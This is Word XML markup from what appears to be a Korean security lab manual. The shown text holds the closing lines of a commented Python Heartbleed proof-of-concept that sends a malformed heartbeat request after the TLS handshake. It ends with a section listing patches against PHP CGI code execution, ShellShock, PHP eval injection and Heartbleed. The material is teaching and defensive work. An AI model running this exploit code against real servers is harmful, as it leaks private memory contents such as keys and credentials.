          <w:p w14:paraId="7D146559" w14:textId="5E832F11" w:rsidR="001F6E1C" w:rsidRPr="001F6E1C" w:rsidRDefault="001F6E1C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>
              <w:rPr>
                <w:rFonts w:ascii="굴림체" w:eastAsia="굴림체" w:hAnsi="굴림체" w:cs="굴림체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</w:t>
            </w:r>
            <w:r w:rsidRPr="008624A9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# </w:t>
            </w:r>
            <w:r w:rsidRPr="008624A9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버퍼에 있는 내용을 바로 출력시킨다</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2056959E" w14:textId="69B195A3" w:rsid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sys.stdout</w:t>
            </w:r>
            <w:proofErr w:type="gram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.flush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)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5CC66EB9" w14:textId="427A991E" w:rsidR="001F6E1C" w:rsidRPr="001F6E1C" w:rsidRDefault="001F6E1C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 w:rsidRPr="001F6E1C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</w:t>
            </w:r>
            <w:r w:rsidRPr="001F6E1C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  # </w:t>
            </w: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무한 </w:t>
            </w:r>
            <w:r w:rsidRPr="001F6E1C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반복</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34B680FA" w14:textId="7450FD8B" w:rsid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while True:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="621BC20B" w14:textId="508E847D" w:rsidR="001F6E1C" w:rsidRPr="001F6E1C" w:rsidRDefault="001F6E1C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 w:rsidRPr="001F6E1C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</w:t>
            </w:r>
            <w:r w:rsidRPr="001F6E1C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      # </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001F6E1C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recvmsg</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001F6E1C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</w:t>
            </w:r>
            <w:r w:rsidRPr="001F6E1C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함수에 </w:t>
            </w:r>
            <w:r w:rsidRPr="001F6E1C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s</w:t>
            </w:r>
            <w:r w:rsidRPr="001F6E1C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소켓을 전달하여 받은 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001F6E1C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반환값을</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001F6E1C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typ</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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ver</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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, pay </w:t>
            </w:r>
            <w:r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변수에 </w:t>
            </w:r>
            <w:r w:rsidRPr="001F6E1C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저장한다</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="587EC199" w14:textId="067D910C" w:rsid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typ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ver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, pay = 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recvmsg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s)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A322079" w14:textId="12B5AAB2" w:rsidR="001F6E1C" w:rsidRPr="001F6E1C" w:rsidRDefault="001F6E1C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 w:rsidRPr="001F6E1C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</w:t>
            </w:r>
            <w:r w:rsidRPr="001F6E1C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      # </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001F6E1C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typ</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001F6E1C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이 </w:t>
            </w:r>
            <w:r w:rsidRPr="001F6E1C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None</w:t>
            </w:r>
            <w:r w:rsidRPr="001F6E1C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이라면 서버 연결 끊김 메시지 출력 후 종료</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11D5EF10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    if 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typ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== None:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5741028A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        print 'Server closed connection without sending Server Hello.'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="740B5E24" w14:textId="5E622729" w:rsid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        return</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76852815" w14:textId="00EC859F" w:rsidR="001F6E1C" w:rsidRPr="001F6E1C" w:rsidRDefault="001F6E1C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 w:rsidRPr="001F6E1C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</w:t>
            </w:r>
            <w:r w:rsidRPr="001F6E1C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      # </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001F6E1C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typ</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001F6E1C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가 </w:t>
            </w:r>
            <w:r w:rsidRPr="001F6E1C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2</w:t>
            </w:r>
            <w:r w:rsidRPr="001F6E1C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2이고,</w:t>
            </w:r>
            <w:r w:rsidRPr="001F6E1C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pay[0]</w:t>
            </w:r>
            <w:r w:rsidRPr="001F6E1C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값의 아스키 값이 </w:t>
            </w:r>
            <w:r w:rsidRPr="001F6E1C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0x0E </w:t>
            </w:r>
            <w:r w:rsidRPr="001F6E1C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라면 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001F6E1C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반복문</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001F6E1C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탈출</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73278E80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    # Look for server hello done message.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F92B56B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    if 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typ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== 22 and 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ord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  <w:proofErr w:type="gram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pay[</w:t>
            </w:r>
            <w:proofErr w:type="gram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0]) == 0x0E:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A469985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        break</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="117C6061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</w:p>
          <w:p w14:paraId="6B8A33A4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print 'Sending heartbeat request...'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="412C7300" w14:textId="61448FE7" w:rsidR="00D21FFD" w:rsidRDefault="00D21FFD" w:rsidP="00D21F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200" w:firstLine="480"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624A9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# </w:t>
            </w:r>
            <w:r w:rsidRPr="008624A9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버퍼에 있는 내용을 바로 출력시킨다</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2FEC0294" w14:textId="1E518702" w:rsid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sys.stdout</w:t>
            </w:r>
            <w:proofErr w:type="gram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.flush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)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38B51565" w14:textId="11A8F5D3" w:rsidR="00D21FFD" w:rsidRPr="00D21FFD" w:rsidRDefault="00D21FFD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 w:rsidRPr="00D21FFD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</w:t>
            </w:r>
            <w:r w:rsidRPr="00D21FFD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  # </w:t>
            </w:r>
            <w:r w:rsidRPr="00D21FFD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연결된 소켓에 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D21FFD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hb</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D21FFD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변수를 보낸다</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C2BC61B" w14:textId="19EB547B" w:rsid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s.send</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gram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hb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</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7414A854" w14:textId="168D1450" w:rsidR="00D21FFD" w:rsidRPr="00D21FFD" w:rsidRDefault="00D21FFD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 w:rsidRPr="00D21FFD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 </w:t>
            </w:r>
            <w:r w:rsidRPr="00D21FFD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  # </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D21FFD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h</w:t>
            </w:r>
            <w:r w:rsidRPr="00D21FFD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>it_hb</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D21FFD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 xml:space="preserve">함수에 </w:t>
            </w:r>
            <w:r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s </w:t>
            </w:r>
            <w:r w:rsidRPr="00D21FFD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소켓을 전달한다</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="065BA13A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hit_hb</w:t>
            </w:r>
            <w:proofErr w:type="spell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s)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0444D004" w14:textId="3D510AF1" w:rsid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</w:p>
          <w:p w14:paraId="691D9D22" w14:textId="37DB89A6" w:rsidR="00D21FFD" w:rsidRPr="00D21FFD" w:rsidRDefault="00D21FFD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</w:pPr>
            <w:r w:rsidRPr="00D21FFD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#</w:t>
            </w:r>
            <w:r w:rsidRPr="00D21FFD">
              <w:rPr>
                <w:rFonts w:ascii="굴림체" w:eastAsia="굴림체" w:hAnsi="굴림체" w:cs="굴림체"/>
                <w:color w:val="00B050"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> main</w:t>
            </w:r>
            <w:r w:rsidRPr="00D21FFD">
              <w:rPr>
                <w:rFonts w:ascii="굴림체" w:eastAsia="굴림체" w:hAnsi="굴림체" w:cs="굴림체" w:hint="eastAsia"/>
                <w:color w:val="00B050"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>함수 실행</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5EECE7CB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if __name__ == '__main__':</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="41853561" w14:textId="77777777" w:rsidR="008A727E" w:rsidRPr="008A727E" w:rsidRDefault="008A727E" w:rsidP="008A72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 </w:t>
            </w:r>
            <w:proofErr w:type="gramStart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main(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="008A727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</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="334F762C" w14:textId="77777777" w:rsidR="0062784A" w:rsidRDefault="0062784A"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4E617EFF" w14:textId="77777777" w:rsidR="0062784A" w:rsidRDefault="0062784A"/>
    <w:p w14:paraId="4A091F3F" w14:textId="617AAC04" w:rsidR="00D46CEB" w:rsidRDefault="00D46CEB">
      <w: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BE7966" w14:paraId="431F51FE" w14:textId="77777777" w:rsidTr="006D3E89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393BB86F" w14:textId="0DE5F588" w:rsidR="006F2E6D" w:rsidRPr="00BE7966" w:rsidRDefault="006F2E6D" w:rsidP="006D3E89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E58C32B" wp14:editId="3BD3DF66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10" name="직사각형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7E3E8" id="직사각형 10" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:-4.65pt;margin-top:-666.75pt;width:533.25pt;height:550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sesw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50741D" w14:paraId="49ECA505" w14:textId="77777777" w:rsidTr="006D3E89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39944AF" w14:textId="0063633F" w:rsidR="006F2E6D" w:rsidRPr="0050741D" w:rsidRDefault="006F2E6D" w:rsidP="006D3E89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 xml:space="preserve">5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보안대책 적용시 공격결과 </w:t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>(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최종 매뉴얼에 포함)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006F2E6D" w:rsidRPr="006F2E6D" w14:paraId="51CC8549" w14:textId="77777777" w:rsidTr="006D3E89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6DE318AE" w14:textId="5FE24D17" w:rsidR="009E202F" w:rsidRDefault="009E202F" w:rsidP="009E202F">
            <w:pPr>
              <w:ind w:firstLineChars="100" w:firstLine="19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본 글에서 다루는 공격들은 각기 다른 취약점을 바탕으로 진행되나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근본적으로 오래전 또는 최근에 이미 알려졌던 취약점을 기반으로 하고 있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따라서 가장 쉬운 보안 대책은 해당 취약점을 해결한 최신 버전으로 업데이트하는 것이며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모든 공격이 이에 해당된다.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="07B4487F" w14:textId="77777777" w:rsidR="009E202F" w:rsidRDefault="009E202F" w:rsidP="009E202F">
            <w:pPr>
              <w:ind w:firstLineChars="100" w:firstLine="190"/>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="507A37B4" w14:textId="77777777" w:rsidR="006F2E6D" w:rsidRDefault="006F2E6D" w:rsidP="006D3E89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94C3F1F" wp14:editId="4A2E1C74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11" name="직사각형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2F017" id="직사각형 11" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:-3pt;margin-top:-53.15pt;width:533.25pt;height:766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Ewsw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 w:rsidR="000E0C49">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="000E0C49">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">. </w:t>
            </w:r>
            <w:r w:rsidR="009E202F">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>PHP CGI Remote Code Execution</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16839A8B" w14:textId="7C2A99EC" w:rsidR="009E202F" w:rsidRPr="00BE7966" w:rsidRDefault="009E202F" w:rsidP="006D3E89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사용하는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php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버전을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5.4.12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이후 버전으로 패치하여 보안 패치 코드를 적용한다.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006F2E6D" w:rsidRPr="00B67587" w14:paraId="6EBC9BDE" w14:textId="77777777" w:rsidTr="006D3E89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04A92B95" w14:textId="77777777" w:rsidR="006F2E6D" w:rsidRDefault="000E0C49" w:rsidP="000E0C49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2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. </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="009E202F">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>ShellShock</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="009E202F">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> Vulnerability</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E22239A" w14:textId="57CFBA63" w:rsidR="009E202F" w:rsidRPr="000E0C49" w:rsidRDefault="009E202F" w:rsidP="000E0C49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사용하는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bash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쉘의 버전을 업데이트한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</w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006F2E6D" w:rsidRPr="00BE7966" w14:paraId="29D61AC7" w14:textId="77777777" w:rsidTr="006D3E89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4B47415" w14:textId="77777777" w:rsidR="006F2E6D" w:rsidRPr="00BE7966" w:rsidRDefault="006F2E6D" w:rsidP="006D3E89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</w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006F2E6D" w:rsidRPr="00BE7966" w14:paraId="1DC602C7" w14:textId="77777777" w:rsidTr="006D3E89">
        <w:trPr>
          <w:trHeight w:val="424"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10686" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0F4C5CCF" w14:textId="77777777" w:rsidR="006F2E6D" w:rsidRDefault="000E0C49" w:rsidP="006D3E89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3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. </w:t>
            </w:r>
            <w:r w:rsidR="009E202F">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>PHP Eval Function + PHP Injection</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="15CE1345" w14:textId="2A2A212C" w:rsidR="009E202F" w:rsidRPr="00BE7966" w:rsidRDefault="009E202F" w:rsidP="006D3E89">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia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eval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함수의 취약점으로 인해 발생한 문제로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이는 아직까지 유효하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따라서 e</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>val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함수를 사용하지 않는 것이</w:t>
            </w:r>
            <w:r w:rsidR="00FB2AD6">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> 최선의 방법이며,</w:t>
            </w:r>
            <w:r w:rsidR="00FB2AD6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="00FB2AD6">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>필요시 다른 함수를 대체하여 사용한다.</w:t>
            </w:r>
            <w:r w:rsidR="00FB2AD6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="00FB2AD6">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">이는 올바른 </w:t>
            </w:r>
            <w:r w:rsidR="00FB2AD6">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">return </w:t>
            </w:r>
            <w:r w:rsidR="00FB2AD6">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>값을 활용하는 임의의 사용자 정의 함수를 이용하는 것으로도 예방할 수 있다.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006F2E6D" w:rsidRPr="0058148E" w14:paraId="5A8AF4DD" w14:textId="77777777" w:rsidTr="006D3E89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07DCFE53" w14:textId="77777777" w:rsidR="000E0C49" w:rsidRDefault="000E0C49" w:rsidP="006D3E89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4</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>. Heartbleed</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5065556C" w14:textId="56147542" w:rsidR="009E202F" w:rsidRPr="0058148E" w:rsidRDefault="009E202F" w:rsidP="006D3E89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ssl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버전을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패치하거나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보안 패치 코드를 적용한다.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006F2E6D" w:rsidRPr="0058148E" w14:paraId="067EED0D" w14:textId="77777777" w:rsidTr="006D3E89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1FE099F4" w14:textId="177BF810" w:rsidR="006F2E6D" w:rsidRPr="0058148E" w:rsidRDefault="000E0C49" w:rsidP="006D3E89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CVE</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t> Details - </w:t>
            </w:r>
            <w:hyperlink r:id="rId74" w:tgtFrame="_blank" w:history="1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="ab"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                  <w:color w:val="005FC1"/>
                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:t>https://www.cvedetails.com/cve/CVE-2014-0160/?q=CVE-2014-0160</w:t>
              </w:r>
            </w:hyperlink>
            <w:r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</w:tr>
      <w:bookmarkEnd w:id="1"/>
    </w:tbl>
    <w:p w14:paraId="5B17785A" w14:textId="77777777" w:rsidR="0016436D" w:rsidRDefault="0016436D" w:rsidP="008335CD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="나눔스퀘어_ac" w:eastAsia="나눔스퀘어_ac" w:hAnsi="나눔스퀘어_ac"/>
          <w:sz w:val="38"/>
          <w:szCs w:val="38"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="0016436D" w:rsidSect="00F21CD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C9F9E" w14:textId="77777777" w:rsidR="003900E1" w:rsidRDefault="003900E1" w:rsidP="000D6EBD">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="7B468E44" w14:textId="77777777" w:rsidR="003900E1" w:rsidRDefault="003900E1" w:rsidP="000D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X인생극장B">
    <w:altName w:val="바탕"/>
    <w:charset w:val="81"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="800002A7" w:usb1="29D7FCFB" w:usb2="00000010" w:usb3="00000000" w:csb0="0028000D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스퀘어_ac">
    <w:altName w:val="맑은 고딕"/>
    <w:charset w:val="81"/>
    <w:family w:val="modern"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="00000000" w:usb1="29D72C10" w:usb2="00000010" w:usb3="00000000" w:csb0="00280005" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="DX국민시대">
    <w:panose1 w:val="02020600000000000000"/>
    <w:charset w:val="81"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="800002A7" w:usb1="29D7FCFB" w:usb2="00000010" w:usb3="00000000" w:csb0="0028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3D7E1" w14:textId="77777777" w:rsidR="003900E1" w:rsidRDefault="003900E1" w:rsidP="000D6EBD">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="308F350E" w14:textId="77777777" w:rsidR="003900E1" w:rsidRDefault="003900E1" w:rsidP="000D6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B5986"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6F78A9CC"/>
    <w:lvl w:ilvl="0" w:tplc="DA26791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BFC61DA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="10420F78"/>
    <w:lvl w:ilvl="0" w:tplc="FBC2C4F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D564F2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="25523F40"/>
    <w:lvl w:ilvl="0" w:tplc="5624F546">
      <w:start w:val="2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156D1CC5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="10586E88"/>
    <w:lvl w:ilvl="0" w:tplc="B0923C4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5A87D37"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6FE87156"/>
    <w:lvl w:ilvl="0" w:tplc="7722CC3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7A62C7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E31A0A88"/>
    <w:lvl w:ilvl="0" w:tplc="7898D03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8232DF1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="203A9CD0"/>
    <w:lvl w:ilvl="0" w:tplc="3D2E609E">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1)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5" w:hanging="400"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="0409001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="1295" w:hanging="400"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="0409000F" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1695" w:hanging="400"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="04090019" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="upperLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2095" w:hanging="400"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="0409001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2495" w:hanging="400"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="0409000F" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2895" w:hanging="400"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="04090019" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="upperLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3295" w:hanging="400"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="0409001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="3695" w:hanging="400"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="1A026F66"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3BD239FA"/>
    <w:lvl w:ilvl="0" w:tplc="5A409CB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8" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="1B432215"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C0B2E6DC"/>
    <w:lvl w:ilvl="0" w:tplc="D3EE0A76">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="(%1)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D6E4027"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1786E328"/>
    <w:lvl w:ilvl="0" w:tplc="485C696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4CA23AF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B8729496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5142A12"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="203A9CD0"/>
    <w:lvl w:ilvl="0" w:tplc="3D2E609E">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1)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5" w:hanging="400"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="0409001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="1295" w:hanging="400"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="0409000F" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1695" w:hanging="400"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="04090019" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="upperLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2095" w:hanging="400"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="0409001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2495" w:hanging="400"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="0409000F" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2895" w:hanging="400"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="04090019" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="upperLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3295" w:hanging="400"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="0409001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="3695" w:hanging="400"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="12" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="281B54E1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2788FC42"/>
    <w:lvl w:ilvl="0" w:tplc="474A40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C513CA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C35AF4E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F5F7EE2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
